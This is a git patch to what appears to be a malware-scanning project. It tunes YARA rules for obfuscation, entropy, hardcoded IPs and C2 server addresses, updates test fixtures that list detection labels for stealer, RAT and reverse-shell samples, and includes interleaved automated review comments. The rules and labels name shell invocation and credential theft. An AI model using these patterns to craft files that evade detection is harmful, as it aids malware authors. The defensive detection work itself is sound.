[target](https://github.com/search?q=target&type=code) | | -MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | | -LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#gzip) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | | -LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | diff --git a/tests/macOS/clean/ls.sdiff.level_2 b/tests/macOS/clean/ls.sdiff.level_2 index f2fe90892..fa0ab56fa 100644 --- a/tests/macOS/clean/ls.sdiff.level_2 +++ b/tests/macOS/clean/ls.sdiff.level_2 @@ -1,4 +1,3 @@ --- missing: ls.x86_64 --lateral/scan/tool -process/name_set ++++ added: ls diff --git a/tests/macOS/clean/ls.sdiff.trigger_2 b/tests/macOS/clean/ls.sdiff.trigger_2 index 3ed486b6c..9e0e93a9c 100644 --- a/tests/macOS/clean/ls.sdiff.trigger_2 +++ b/tests/macOS/clean/ls.sdiff.trigger_2 @@ -3,7 +3,6 @@ -discover/system/hostname_get -exec/shell/TERM -fs/link_read --lateral/scan/tool -net/url/embedded -process/name_set ++++ added: ls diff --git a/tests/macOS/clean/ls.sdiff.trigger_3 b/tests/macOS/clean/ls.sdiff.trigger_3 index 3ed486b6c..9e0e93a9c 100644 --- a/tests/macOS/clean/ls.sdiff.trigger_3 +++ b/tests/macOS/clean/ls.sdiff.trigger_3 @@ -3,7 +3,6 @@ -discover/system/hostname_get -exec/shell/TERM -fs/link_read --lateral/scan/tool -net/url/embedded -process/name_set ++++ added: ls 
diff --git a/tests/npm/2024.harthat/deference.js.simple b/tests/npm/2024.harthat/deference.js.simple index 9c67ea4d0..96d9cf0f3 100644 --- a/tests/npm/2024.harthat/deference.js.simple +++ b/tests/npm/2024.harthat/deference.js.simple @@ -1,6 +1,6 @@ # npm/2024.harthat/deference.js: critical c2/addr/ip: high -c2/addr/url: high +c2/addr/url: medium discover/system/platform: medium evasion/indicator_blocking/echo_off: high fs/file/delete: medium diff --git a/tests/npm/2024.next-react-notify/tocall.js.simple b/tests/npm/2024.next-react-notify/tocall.js.simple index 094947a69..60a0942ec 100644 --- a/tests/npm/2024.next-react-notify/tocall.js.simple +++ b/tests/npm/2024.next-react-notify/tocall.js.simple @@ -1,7 +1,7 @@ # npm/2024.next-react-notify/tocall.js: critical anti-static/obfuscation/powershell: critical c2/addr/ip: high -c2/addr/url: high +c2/addr/url: medium discover/system/platform: medium evasion/bypass_security/executionpolicy_bypass: high evasion/indicator_blocking/echo_off: high diff --git a/tests/php/2024.sagsooz/2024.php.simple b/tests/php/2024.sagsooz/2024.php.simple index cbfd6bcef..3789511f5 100644 --- a/tests/php/2024.sagsooz/2024.php.simple +++ b/tests/php/2024.sagsooz/2024.php.simple @@ -5,6 +5,7 @@ data/base64/decode: medium data/embedded/base64_url: medium data/embedded/html: medium data/encoding/base64: low +discover/process/effective_groupid_get: medium evasion/indicator_blocking/mask_exceptions: medium evasion/time/php_no_limit: medium exec/shell/command: medium @@ -17,4 +18,3 @@ net/http/form_upload: medium net/http/post: medium net/url/embedded: low net/url/encode: medium -process/effective_groupid_get: medium diff --git a/tests/php/clean/run-tests.php.simple b/tests/php/clean/run-tests.php.simple index d6586237e..55d7d2da0 100644 --- a/tests/php/clean/run-tests.php.simple +++ b/tests/php/clean/run-tests.php.simple 
@@ -18,7 +18,6 @@ fs/symlink_resolve: low fs/tempdir: low fs/tempdir/TEMP: low impact/remote_access/reverse_shell: medium -lateral/scan/tool: medium net/http/cookies: medium net/http/form_upload: medium net/http/post: medium diff --git a/tests/python/2021.DiscordSafety/setup.py.simple b/tests/python/2021.DiscordSafety/setup.py.simple index 32765505a..b6ef8b6f4 100644 --- a/tests/python/2021.DiscordSafety/setup.py.simple +++ b/tests/python/2021.DiscordSafety/setup.py.simple @@ -2,7 +2,7 @@ anti-static/obfuscation/hex: medium anti-static/obfuscation/python: critical anti-static/unmarshal/marshal: high -c2/addr/url: high +c2/addr/url: medium collect/databases/leveldb: medium data/encoding/base64: low data/encoding/marshal: medium diff --git a/tests/python/2024.Custom.RAT/output.py.simple b/tests/python/2024.Custom.RAT/output.py.simple index cf8b7e468..fe9eedbe5 100644 --- a/tests/python/2024.Custom.RAT/output.py.simple +++ b/tests/python/2024.Custom.RAT/output.py.simple @@ -15,6 +15,7 @@ data/encoding/json_decode: low discover/ip/geo: high discover/ip/public: high discover/network/interface_list: medium +discover/process/name_get: medium discover/system/network: high discover/system/platform: medium discover/system/sysinfo: medium @@ -52,5 +53,4 @@ os/fd/write: low persist/daemon: medium privesc/uac_bypass: high process/multithreaded: medium -process/name_get: medium process/terminate/taskkill: high diff --git a/tests/python/clean/numpy/misc_util.py.simple b/tests/python/clean/numpy/misc_util.py.simple index 6907bcce7..8ccb1207f 100644 --- a/tests/python/clean/numpy/misc_util.py.simple +++ b/tests/python/clean/numpy/misc_util.py.simple @@ -18,6 +18,7 @@ fs/path/usr_lib_python: medium fs/path/usr_local: medium fs/symlink_resolve: low fs/tempdir/create: low +hw/dev/ubi: low net/ip/spoof: medium net/url/embedded: low os/env/get: low 
diff --git a/tests/python/clean/versioneer/versioneer.py.simple b/tests/python/clean/versioneer/versioneer.py.simple index 08ebb2614..b075018d3 100644 --- a/tests/python/clean/versioneer/versioneer.py.simple +++ b/tests/python/clean/versioneer/versioneer.py.simple @@ -6,4 +6,5 @@ data/embedded/base64_url: medium data/encoding/base64: low fs/file/open: low fs/path/usr_bin: low +hw/dev/ubi: low os/fd/write: low diff --git a/tests/windows/2024.GitHub.Clipper/raw.py.simple b/tests/windows/2024.GitHub.Clipper/raw.py.simple index 4879f9c77..821ae34d9 100644 --- a/tests/windows/2024.GitHub.Clipper/raw.py.simple +++ b/tests/windows/2024.GitHub.Clipper/raw.py.simple @@ -1,5 +1,5 @@ # windows/2024.GitHub.Clipper/raw.py: critical -c2/addr/url: high +c2/addr/url: medium c2/tool_transfer/download: high c2/tool_transfer/exe_url: high c2/tool_transfer/python: high diff --git a/tests/windows/2024.aspdasdksa2/creal.exe.simple b/tests/windows/2024.aspdasdksa2/creal.exe.simple index 7705f417c..d6c10054b 100644 --- a/tests/windows/2024.aspdasdksa2/creal.exe.simple +++ b/tests/windows/2024.aspdasdksa2/creal.exe.simple @@ -18,7 +18,6 @@ fs/file/delete: medium fs/file/read: low fs/file/write: low fs/path/relative: medium -lateral/scan/tool: medium net/dns/txt: low net/url/embedded: low net/url/parse: low diff --git a/tests/windows/2024.aspdasdksa2/creal.pyc.simple b/tests/windows/2024.aspdasdksa2/creal.pyc.simple index fae239ad2..35c4226f7 100644 --- a/tests/windows/2024.aspdasdksa2/creal.pyc.simple +++ b/tests/windows/2024.aspdasdksa2/creal.pyc.simple @@ -26,7 +26,6 @@ exfil/stealer/credit_card: medium exfil/stealer/creds: high exfil/stealer/discord: high exfil/stealer/wallet: critical -lateral/scan/tool: medium net/download: medium net/download/fetch: medium net/http/fake_user_agent: medium From 6461bc0c7aaa2d811bf918a9aecfcc2b1483a5d5 Mon Sep 17 00:00:00 2001 
From: Thomas Stromberg Date: Sat, 9 Nov 2024 22:06:29 -0500 Subject: [PATCH 3/7] further rule tuning --- pkg/action/testdata/scan_archive | 3 +- rules/anti-static/elf/entropy.yara | 7 +- rules/anti-static/elf/header.yara | 3 +- rules/anti-static/elf/tiny.yara | 7 +- rules/anti-static/macho/tiny.yara | 1 - rules/anti-static/obfuscation/bitwise.yara | 28 ++- rules/anti-static/obfuscation/hex.yara | 15 +- rules/anti-static/obfuscation/python.yara | 8 +- rules/anti-static/packer/cx_freeze.yara | 5 +- rules/anti-static/packer/high_entropy.yara | 27 --- rules/c2/addr/ip.yara | 30 +-- rules/c2/addr/server.yara | 28 +-- rules/c2/addr/url.yara | 29 ++- rules/c2/server_address.yara | 16 -- rules/c2/tool_transfer/download.yara | 9 +- rules/c2/tool_transfer/shell.yara | 2 +- rules/credential/ssh/ssh.yara | 16 +- .../process/{name-get.yara => name.yara} | 0 .../{parent_pid-get.yara => parent.yara} | 0 rules/discover/system/dev_full.yara | 10 + rules/discover/system/proc.yara | 20 ++ rules/discover/system/system_network.yara | 17 +- .../evasion/file/location/chdir-unusual.yara | 5 +- rules/evasion/file/location/x11-unix.yara | 3 +- rules/evasion/file/prefix/prefix.yara | 2 +- rules/evasion/file/prefix/tmp.yara | 17 ++ .../hijack_execution/etc-ld.so.preload.yara | 3 +- rules/evasion/logging/dev_log.yara | 10 + rules/evasion/logging/syslog.yara | 1 + rules/evasion/mimicry/fake-library.yara | 5 +- rules/evasion/net/http_443.yara | 3 +- rules/evasion/process_injection/ptrace.yara | 23 ++- rules/evasion/rootkit/linux_kernel.yara | 3 +- rules/exec/shell/bash_dev_tcp.yara | 8 +- rules/exec/shell/sighup_trap.yara | 9 +- rules/exfil/stealer/pam.yara | 5 +- rules/false_positives/libdw.yara | 5 +- rules/false_positives/linux_src.yara | 1 - rules/false_positives/slirp.yara | 1 + rules/false_positives/snapd.yara | 5 +- rules/false_positives/sudo.yara | 9 +- rules/false_positives/vmtools.yara | 8 +- .../permission-modify-dangerous.yara | 3 +- rules/fs/proc/arbitrary-pid.yara | 4 +- 
rules/fs/proc/pid-exe.yara | 26 ++- rules/hw/dev/kmem.yara | 1 + rules/hw/dev/sd_mmc.yara | 3 +- rules/hw/dev/ubi.yara | 23 ++- rules/impact/degrade/firewall.yara | 3 +- rules/impact/exploit/GCONV_PATH.yara | 2 +- rules/impact/remote_access/backdoor.yara | 6 +- rules/impact/remote_access/net_term.yara | 3 +- rules/impact/remote_access/py_setuptools.yara | 2 +- rules/impact/remote_access/reverse_shell.yara | 4 +- rules/net/download/fetch.yara | 36 ++-- rules/net/ftp/tftp.yara | 11 + .../persist/kernel_module/symbol-lookup.yara | 3 +- rules/persist/sysv/sysv.yara | 11 + ...4796BB27126E03A7E25DD5D589.cache.js.simple | 3 +- ...D016DDDA0665CB8CD8EEA6C537.cache.js.simple | 4 +- tests/javascript/clean/mode-php.js.simple | 2 +- .../clean/mode-php_laravel_blade.js.simple | 2 +- tests/javascript/clean/php.js.simple | 2 +- .../2022.bpfdoor/2023.ConnectBack/tiny.md | 9 +- tests/linux/2023.ConnectBack/tiny.md | 9 +- tests/linux/2023.Kinsing/install.sh.simple | 2 +- .../eight-nebraska-autumn-illinois.simple | 2 +- tests/linux/2024.gas/gas.simple | 3 +- tests/linux/2024.kubo_injector/injector.json | 11 - .../emp3r0r.agent.simple | 2 +- .../2024.kworker_pretenders/gafgyt.simple | 2 +- tests/linux/2024.medusa/rkload.simple | 3 +- tests/linux/2024.sbcl.market/sbcl.sdiff | 2 +- ...5d0e2031551f9f1a70b6db475ba71b2.elf.simple | 4 +- tests/linux/UPX/06ed158.md | 16 +- tests/linux/clean/appsec-rules.json.simple | 4 +- tests/linux/clean/busybox.simple | 2 +- tests/linux/clean/caddy.simple | 2 +- tests/linux/clean/chezmoi.simple | 2 +- tests/linux/clean/chrome.simple | 7 +- tests/linux/clean/clickhouse.simple | 4 +- tests/linux/clean/code-oss.md | 7 +- tests/linux/clean/containerd.simple | 2 +- tests/linux/clean/default_config.json.simple | 4 +- ...735-4b24-9cc6-c78dfc9fc9c9_108.json.simple | 1 - .../kibana/securitySolution.chunk.9.js.simple | 4 +- tests/linux/clean/kuma-cp.simple | 2 +- tests/linux/clean/ld-2.27.so.simple | 3 +- tests/linux/clean/libgcj.so.17.0.0.simple | 4 +- 
tests/linux/clean/libgcj.so.17.simple | 4 +- tests/linux/clean/libsystemd.so.0.simple | 2 +- tests/linux/clean/ls.x86_64.md | 1 + tests/linux/clean/lslogins.md | 1 + tests/linux/clean/mongosh.simple | 6 +- tests/linux/clean/nvim.simple | 1 - tests/linux/clean/pandoc.md | 7 +- tests/linux/clean/pulumi.simple | 4 +- tests/linux/clean/qemu-system-xtensa.md | 191 +++++++++--------- tests/linux/clean/redis-server.aarch64.md | 97 ++++----- tests/linux/clean/rules.json.simple | 4 +- tests/linux/clean/slack.md | 7 +- tests/linux/clean/slirp4netns.simple | 8 +- tests/linux/clean/sudo.simple | 4 +- tests/linux/clean/tracer.o.aarch64.simple | 1 + tests/linux/clean/trivy.simple | 5 +- tests/linux/clean/trufflehog.md | 5 +- .../mimipenguin/python/mimipenguin.simple | 2 +- tests/macOS/2024.LightSpy/dropper.simple | 2 +- tests/macOS/clean/ls.mdiff | 1 + tests/macOS/clean/ls.sdiff.trigger_2 | 1 + tests/macOS/clean/ls.sdiff.trigger_3 | 1 + tests/npm/2024.testerrrrrrrrrr/init.js.simple | 2 +- .../valyrian_debug_setup.py.simple | 5 +- tests/python/2024.Custom.RAT/output.py.simple | 2 +- tests/python/clean/hatch/migrate.py.simple | 2 +- tests/python/clean/numba/support.py.simple | 2 +- .../clean/setuptools/namespaces.py.simple | 2 +- .../windows/2024.aspdasdksa2/creal.exe.simple | 1 + 118 files changed, 579 insertions(+), 466 deletions(-) delete mode 100644 rules/anti-static/packer/high_entropy.yara delete mode 100644 rules/c2/server_address.yara rename rules/discover/process/{name-get.yara => name.yara} (100%) rename rules/discover/process/{parent_pid-get.yara => parent.yara} (100%) create mode 100644 rules/discover/system/dev_full.yara create mode 100644 rules/discover/system/proc.yara create mode 100644 rules/evasion/file/prefix/tmp.yara create mode 100644 rules/evasion/logging/dev_log.yara create mode 100644 rules/net/ftp/tftp.yara create mode 100644 rules/persist/sysv/sysv.yara 
diff --git a/pkg/action/testdata/scan_archive b/pkg/action/testdata/scan_archive index 1fb170804..10a7a0e46 100644 --- a/pkg/action/testdata/scan_archive +++ b/pkg/action/testdata/scan_archive @@ -1,6 +1,6 @@ # testdata/apko_nested.tar.gz ∴ /apko_0.13.2_linux_arm64/apko: medium c2/addr/ip: medium -c2/server_address: medium +c2/addr/server: medium collect/archives/zip: medium credential/keychain: medium credential/password: low @@ -34,6 +34,7 @@ discover/user/name_get: medium evasion/bypass_security/linux/se: medium evasion/file/prefix: medium evasion/hide_artifacts/pivot_root: medium +evasion/process_injection/ptrace: low exec/plugin: low exec/program: medium exec/shell/background_sleep: medium diff --git a/rules/anti-static/elf/entropy.yara b/rules/anti-static/elf/entropy.yara index 72cfcf6d9..e47b11a12 100644 --- a/rules/anti-static/elf/entropy.yara +++ b/rules/anti-static/elf/entropy.yara @@ -18,10 +18,13 @@ rule normal_elf_high_entropy_7: medium { normal_elf and math.entropy(1, filesize) >= 7.1 } -rule normal_elf_high_entropy_7_2: high { +rule normal_elf_high_entropy_7_4: high { meta: description = "high entropy ELF binary (>7.4)" + strings: + $not_whirlpool = "libgcrypt-grub/cipher/whirlpool.c" + condition: - normal_elf and math.entropy(1, filesize) >= 7.4 + normal_elf and math.entropy(1, filesize) >= 7.4 and none of ($not*) } diff --git a/rules/anti-static/elf/header.yara b/rules/anti-static/elf/header.yara index bb8f24f25..3cd577aee 100644 --- a/rules/anti-static/elf/header.yara +++ b/rules/anti-static/elf/header.yara 
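Review bot: The `$not_whirlpool` exclusion added to `normal_elf_high_entropy_7_4` is a single source-path string with no comment recording which binary it was added for, and because the rule is rated high a later reader cannot tell whether the allowlist entry is still needed. A one-line why-comment above it would keep it reviewable, e.g. `// <binary it was added for> (presumably a GRUB libgcrypt module) embeds this path and legitimately scores above 7.4 — confirm`. The rename from `normal_elf_high_entropy_7_2` also changes the rule name that the markdown reports link to (see the `#websocket`-style anchors in the ls.mdiff fixture earlier on this page), so it is worth a mention in the commit message for anyone keying on stored output.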
@@ -40,7 +40,6 @@ rule fake_dynamic_symbols: critical { elf.type == elf.ET_EXEC and elf.entry_point < filesize and elf.number_of_sections > 0 and elf.dynamic_section_entries > 0 and for any i in (0..elf.dynamic_section_entries): (elf.dynamic[i].type == elf.DT_SYMTAB and not (for any j in (0..elf.number_of_sections): (elf.sections[j].type == elf.SHT_DYNSYM and for any k in (0..elf.number_of_segments): ((elf.segments[k].virtual_address <= elf.dynamic[i].val) and ((elf.segments[k].virtual_address + elf.segments[k].file_size) >= elf.dynamic[i].val) and (elf.segments[k].offset + (elf.dynamic[i].val - elf.segments[k].virtual_address)) == elf.sections[j].offset)))) } - rule high_entropy_header: high { meta: description = "high entropy ELF header (>7)" @@ -52,7 +51,7 @@ rule high_entropy_header: high { $not_pyinst = "pyi-bootloader-ignore-signals" $not_go = "syscall_linux.go" $not_go2 = "vdso_linux.go" - $not_module = ".module_license" fullword + $not_module = ".module_license" fullword condition: uint32(0) == 1179403647 and elf.type == elf.ET_EXEC and math.entropy(1200, 4096) > 7 and none of ($not*) diff --git a/rules/anti-static/elf/tiny.yara b/rules/anti-static/elf/tiny.yara index 311e888cc..48edec212 100644 --- a/rules/anti-static/elf/tiny.yara +++ b/rules/anti-static/elf/tiny.yara @@ -4,6 +4,9 @@ rule impossibly_small_elf_program: high { meta: description = "ELF binary is unusually small" + strings: + $not_hello_c = "hello.c" + condition: - filesize < 8192 and uint32(0) == 1179403647 and elf.type == elf.ET_EXEC -} \ No newline at end of file + filesize < 8192 and filesize > 900 and uint32(0) == 1179403647 and elf.type == elf.ET_EXEC and none of ($not*) +} diff --git a/rules/anti-static/macho/tiny.yara b/rules/anti-static/macho/tiny.yara index e36911bd8..6f50f3f43 100644 --- a/rules/anti-static/macho/tiny.yara +++ b/rules/anti-static/macho/tiny.yara @@ -1,4 +1,3 @@ - rule impossibly_small_macho_program: medium { meta: description = "machO binary is unusually small" 
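Review bot: The new `filesize > 900` floor in `impossibly_small_elf_program` is an unexplained magic number, and the `hello.c` exclusion is a bare string with nothing recording which false positive it addresses; both narrow a high-severity rule. A short comment on each would help, e.g. `// ELF files under ~900 bytes were <reason — TODO confirm>` and `// $not_hello_c: tutorial/test binaries that embed their own source filename`. Since `none of ($not*)` is satisfied by any file containing the substring, keeping each exclusion narrow and documented is what keeps the rule trustworthy over time.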
diff --git a/rules/anti-static/obfuscation/bitwise.yara b/rules/anti-static/obfuscation/bitwise.yara index 72201b846..0863d03fd 100644 --- a/rules/anti-static/obfuscation/bitwise.yara +++ b/rules/anti-static/obfuscation/bitwise.yara @@ -22,17 +22,23 @@ rule excessive_bitwise_math: high { hash_2023_aiohttpp_0_1_setup = "cfa4137756f7e8243e7c7edc7cb0b431a2f4c9fa401f2570f1b960dbc86ca7c6" strings: - $x = /\-{0,1}[\da-z]{1,8} \<\< \-{0,1}\d{1,8}/ - $not_Sodium = "Sodium_Core" - $not_SHA512 = "SHA512" - $not_SHA256 = "SHA256" - $not_MD4 = "MD4" - $not_algbase = "algbase" fullword - $not_jslint = "jslint bitwise" - $not_include = "#define " - $not_bitwise = "bitwise" fullword - $not_bitmasks = "bitmasks" fullword - $not_ckbcomp = "ckbcomp" fullword + $x = /\-{0,1}[\da-z]{1,8} \<\< \-{0,1}\d{1,8}/ + $not_Sodium = "Sodium_Core" + $not_SHA512 = "SHA512" + $not_SHA256 = "SHA256" + $not_MD4 = "MD4" + $not_algbase = "algbase" fullword + $not_jslint = "jslint bitwise" + $not_include = "#define " + $not_bitwise = "bitwise" fullword + $not_bitmasks = "bitmasks" fullword + $not_ckbcomp = "ckbcomp" fullword + $not_bit_test = "bits_test" fullword + $not_testing = "*testing.T" + $not_effective_bits = "effective bits" + $not_bit_offsets = "bit offsets" + $not_uuid = "uuid" fullword + condition: filesize < 192KB and #x > 64 and none of ($not*) } diff --git a/rules/anti-static/obfuscation/hex.yara b/rules/anti-static/obfuscation/hex.yara index 830f2758c..9e7585e13 100644 --- a/rules/anti-static/obfuscation/hex.yara +++ b/rules/anti-static/obfuscation/hex.yara 
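Review bot: `$not_uuid = "uuid" fullword` in `excessive_bitwise_math` is a very broad suppression: the rule targets files under 192KB with more than 64 shift expressions, and `uuid` as a standalone word is a common identifier in the JavaScript bundles that tend to trip it, so this one entry may quietly disable the rule for a large share of its intended inputs. If it was added for one specific library, a longer string from that file would be safer, e.g. `$not_uuid = "<distinctive string from the offending file>"`, with a comment naming the file. The other new entries (`bits_test`, `*testing.T`, `effective bits`, `bit offsets`) are narrow enough that this concern does not apply to them.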
@@ -51,13 +51,14 @@ rule hex_parse_base64_high: high { hash_1985_package_index = "8d4daa082c46bfdef3d85a6b5e29a53ae4f45197028452de38b729d76d3714d1" strings: - $lang_node = /Buffer\.from\(\w{0,16}, {0,2}'hex'\)/ - $lang_python = /\.unhexlify\(/ - $b_base64 = "base64" - $b_b64decode = "b64decode" - $not_sha256 = "sha256" fullword - $not_sha512 = "sha512" fullword - $not_algorithms = "algorithms" fullword + $lang_node = /Buffer\.from\(\w{0,16}, {0,2}'hex'\)/ + $lang_python = /\.unhexlify\(/ + $b_base64 = "base64" + $b_b64decode = "b64decode" + $not_sha256 = "sha256" fullword + $not_sha512 = "sha512" fullword + $not_algorithms = "algorithms" fullword + $not_python_base64 = "return binascii.unhexlify(s)" condition: filesize < 32KB and any of ($lang*) and any of ($b*) and none of ($not*) diff --git a/rules/anti-static/obfuscation/python.yara b/rules/anti-static/obfuscation/python.yara index 20567d367..16d69cf7c 100644 --- a/rules/anti-static/obfuscation/python.yara +++ b/rules/anti-static/obfuscation/python.yara @@ -220,8 +220,11 @@ rule fernet_base64: high { $o6 = "exec(" $o7 = "eval(" + $not_utils = "from cryptography import utils" + $not_fernet_itself = "class Fernet" + condition: - filesize < 2MB and any of ($fernet*) and any of ($bdecode*) and any of ($o*) + filesize < 2MB and any of ($fernet*) and any of ($bdecode*) and any of ($o*) and none of ($not*) } rule python_long_hex: medium { @@ -261,7 +264,8 @@ rule python_hex_decimal: high { $trash = /\\x{0,1}\d{1,3}\\/ - $not_testing_t = "*testing.T" fullword + $not_testing_t = "*testing.T" fullword + condition: filesize < 1MB and any of ($f*) and #trash in (filesize - 1024..filesize) > 100 and none of ($not*) } diff --git a/rules/anti-static/packer/cx_freeze.yara b/rules/anti-static/packer/cx_freeze.yara index 9240d050c..5de1b23a8 100644 --- a/rules/anti-static/packer/cx_freeze.yara +++ b/rules/anti-static/packer/cx_freeze.yara 
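Review bot: `$not_python_base64 = "return binascii.unhexlify(s)"` in `hex_parse_base64_high` is an allowlist entry with no comment saying which file it was added for; it reads like a line from the standard library's `base64.py`, and that should be recorded so the next reader knows whether it can be dropped, e.g. `// CPython base64.py (b16decode) — the stdlib itself is not a hex-obfuscated payload; confirm`. The two entries added to `fernet_base64` in the following `rules/anti-static/obfuscation/python.yara` hunk have the same gap and are broader: `from cryptography import utils` and `class Fernet` are strings that a user script and the `cryptography` package can both contain, and either alone now silences a high-severity rule. A string unique to the library file being excluded, plus a comment naming that file, would be narrower in both places.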
@@ -3,8 +3,9 @@ rule cxFreeze_Python_executable: high { hash_2023_MacStealer_weed = "6a4f8b65a568a779801b72bce215036bea298e2c08ec54906bb3ebbe5c16c712" strings: - $cxfreeze = "cx_Freeze" + $cxfreeze = "cx_Freeze" + $not_importlib = "tool like cx_Freeze" condition: - filesize < 10485760 and $cxfreeze + filesize < 10485760 and $cxfreeze and none of ($not*) } diff --git a/rules/anti-static/packer/high_entropy.yara b/rules/anti-static/packer/high_entropy.yara deleted file mode 100644 index ec1c7673a..000000000 --- a/rules/anti-static/packer/high_entropy.yara +++ /dev/null @@ -1,27 +0,0 @@ -import "math" - -private rule smallBinary { - condition: - // matches ELF or machO binary - filesize < 64MB and (uint32(0) == 1179403647 or uint32(0) == 4277009102 or uint32(0) == 3472551422 or uint32(0) == 4277009103 or uint32(0) == 3489328638 or uint32(0) == 3405691582 or uint32(0) == 3199925962) -} - -rule high_entropy_7_5: medium { - meta: - description = "higher entropy binary (>7.5)" - - condition: - smallBinary and math.entropy(1, filesize) >= 7.5 -} - -rule high_entropy_7_9: high { - meta: - description = "high entropy binary (>7.9)" - - strings: - // prevent bazel false positive - $bin_java = "bin/java" - - condition: - smallBinary and math.entropy(1, filesize) >= 7.9 and not $bin_java -} diff --git a/rules/c2/addr/ip.yara b/rules/c2/addr/ip.yara index fae0a09d4..561bc67e1 100644 --- a/rules/c2/addr/ip.yara +++ b/rules/c2/addr/ip.yara 
@@ -30,17 +30,18 @@ rule elf_hardcoded_ip: high { strings: // stricter version of what's above: excludes 255.* and *.0.* *.1.*, and 8.* (likely Google) - $sus_ipv4 = /((25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2345679])\.){3}(25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])/ fullword - $not_version = /((25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])\.){3}(25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])[\.\-]/ - $not_incr = "10.11.12.13" - $not_169 = "169.254.169.254" - $not_spyder = "/search/spider" - $not_ruby = "210.251.121.214" - $not_1_2_3_4 = "1.2.3.4" - $not_root_servers_h = "128.63.2.53" - $not_root_servers_i = "192.36.148.17" - $not_123456789 = "123.45.67.89" - $not_libebt_among_init = "libebt_among_init" + $sus_ipv4 = /((25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2345679])\.){3}(25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])/ fullword + $not_version = /((25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])\.){3}(25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])[\.\-]/ + $not_incr = "10.11.12.13" + $not_169 = "169.254.169.254" + $not_spyder = "/search/spider" + $not_ruby = "210.251.121.214" + $not_1_2_3_4 = "1.2.3.4" + $not_root_servers_h = "128.63.2.53" + $not_root_servers_i = "192.36.148.17" + $not_123456789 = "123.45.67.89" + $not_libebt_among_init = "libebt_among_init" + condition: filesize < 12MB and uint32(0) == 1179403647 and 1 of ($sus_ip*) and none of ($not*) } @@ -82,9 +83,10 @@ rule hardcoded_ip_port: high { $not_wireguard = "127.212.121.99:999" $not_minio = "172.16.34.31:9000" $not_test = "def test_" fullword - $not_12 = "12.12.12.12:" - $not_21 = "21.21.21.21:" - $not_255 = "255.255.255.255:" + $not_12 = "12.12.12.12:" + $not_21 = "21.21.21.21:" + $not_255 = "255.255.255.255:" + condition: any of ($ip*) and none of ($not*) } diff --git a/rules/c2/addr/server.yara b/rules/c2/addr/server.yara index c45a2b497..b271b37fd 100644 --- a/rules/c2/addr/server.yara +++ b/rules/c2/addr/server.yara 
@@ -1,21 +1,19 @@ -rule server_addr: medium { +rule server_address: medium { meta: - description = "may execute a shell and communicate with a server" + description = "references a 'server address', possible C2 client" + hash_2024_Downloads_3105 = "31054fb826b57c362cc0f0dbc8af15b22c029c6b9abeeee9ba8d752f3ee17d7d" + hash_2023_Linux_Malware_Samples_450a = "450a7e35f13b57e15c8f4ce1fa23025a7c313931a394c40bd9f3325b981eb8a8" + hash_2023_Linux_Malware_Samples_458e = "458e3e66eff090bc5768779d5388336c8619a744f486962f5dfbf436a524ee04" strings: - $serverAddr = "serverAddr" - $server_addr = "server_addr" - $exec = "exec" - $sh = "/bin/sh" fullword - $sh_bash = "/bin/bash" fullword - $sh_zsh = "/bin/zsh" fullword - $sh_script = "ShellScript" - $sh_exec = "ExecShell" - $sh_cmd = "cmd.exe" - $sh_powershell = "powershell.exe" + $s_underscores = /\w{0,32}server_addr\w{0,32}/ + $s_mixed = /\w{0,32}serverAddr\w{0,32}/ + $s_url = "serverURL" fullword + $s_url2 = "serverUrl" fullword + $s_connect = /\w{0,32}ConnectServer\w{0,32}/ condition: - filesize < 10MB and any of ($server*) and $exec and any of ($sh*) + any of ($s*) } rule server_addr_small: high { @@ -34,6 +32,8 @@ rule server_addr_small: high { $sh_cmd = "cmd.exe" $sh_powershell = "powershell.exe" + $hash_bang = "#!" + condition: - filesize < 128KB and any of ($server*) and $exec and any of ($sh*) + filesize < 1MB and any of ($server*) and $exec and any of ($sh*) and not $hash_bang in (0..3) } diff --git a/rules/c2/addr/url.yara b/rules/c2/addr/url.yara index dd456fc0f..9a05c77c9 100644 --- a/rules/c2/addr/url.yara +++ b/rules/c2/addr/url.yara @@ -25,15 +25,12 @@ rule exotic_tld: high { $not_gov_bd = ".gov.bd" $not_eol = "endoflife.date" $not_whois = "bdia.btcl.com.bd" - $not_arduino = "arduino.cc" + $not_arduino = "arduino.cc" condition: filesize < 10MB and any of ($http*) and none of ($not_*) } - - - rule http_url_with_question: medium { meta: description = "contains hardcoded endpoint with a question mark" 
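Review bot: The rewritten `server_address` rule fires at medium on any single one of five identifier patterns with no `filesize` bound, whereas the replaced `server_addr` required a server-address string plus `exec` plus a shell path under 10MB, so this is a different and broader detection rather than a tuning of the old one. Its strings and hashes match the `rules/c2/server_address.yara` file deleted later in this patch, with `$s_connect = /\w{0,32}ConnectServer\w{0,32}/` as the one addition, so it looks like a move-and-merge; a comment saying so, or `filesize < 10MB and any of ($s*)` to keep the old bound, would make the intent explicit. A bare `serverUrl` identifier is common in ordinary client code, so the medium rating on a lone match is worth a second look.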
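Review bot: `server_addr_small` now scans files up to 1MB instead of 128KB while keeping "small" in its name and its high severity, and the new `not $hash_bang in (0..3)` clause excludes any file with `#!` in its first four bytes without saying why. A comment on the clause would help, e.g. `// skip shebang scripts, which presumably pair exec with a shell path legitimately — confirm`, and if the 1MB ceiling is intentional the name or description should say what "small" now means. The rule's `meta` block and the start of its `strings` section are outside this hunk.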
